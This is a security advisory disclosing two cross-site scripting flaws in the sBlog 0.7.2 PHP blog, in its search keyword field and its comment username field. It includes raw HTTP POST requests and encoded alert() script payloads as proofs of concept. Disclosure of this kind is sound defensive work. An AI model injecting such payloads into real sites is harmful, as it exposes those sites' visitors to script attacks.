sBlog 0.7.2 <== Multiple Cross-Site Scripting Vulnerability

===================================

Information of Software:

Software: sBlog 0.7.2
Site: http://servous.se/
Description: sBlog is a simple and new PHP Blog.  Is very very simple 
and it's use by newbie of PHP.
 
===================================

Bug:

1) Cross-Site Scripting Vulnearbility in the page search.php

sBlog contains a flaw that allows a remote cross site scripting attack. 
The vulnerability is found in search method and the user can modify 
the function GET and insert the XSS code

- HTTP Normal POST Request

http://[target]/[patch]/search.php
POST /[patch]/search.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/[patch]/search.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
keyword=casa

- End of Normal POST Request

but we can modify the request POST in this way:

[....]
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
keyword=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E
[....]

---------------------------------------------------------

PoC for the first vulnerability:

you can insert in the search textbox the key <script>alert("lol");</script> for
execute an XSS attack.

###########################################

2) Cross-Site Scripting Vulnearbility in the name of user post comment

With this vulnerability can be exploited by malicious people to conduct 
script insertion attacks.
Input passed to the "title" field when editing submitted articles and 
reportedly also when commenting on articles isn't properly sanitised 
before being used. This can be 
exploited to inject arbitrary HTML and script code, which will be executed in 
a user's browser session in context of an affected site when the malicious user 
data is viewed.

- HTTP Normal POST Request

http://[target]/[patch]/comments_do.php
POST [patch]/comments_do.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/[patch]/comments.php?id=news_id
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
blog_id=id_of_news&username=Test&email=&homepage=&comment=Test

but we can modify the variable &username in the request POST in this way:

[....]
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
blog_id=3&username=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&email=&homepage=&comment=test
[....]

---------------------------------------------------------

PoC for the second vulnerability:

you can insert in the name textbox of user comment an XSS code for
execute an cross-site scripting attack, or an HTML code

===================================

Credit:

Author:  Kiki
e-mail: federico.sana@alice.it
web page: http://kiki91.altervista.org and http://blackzero.netsons.org

===================================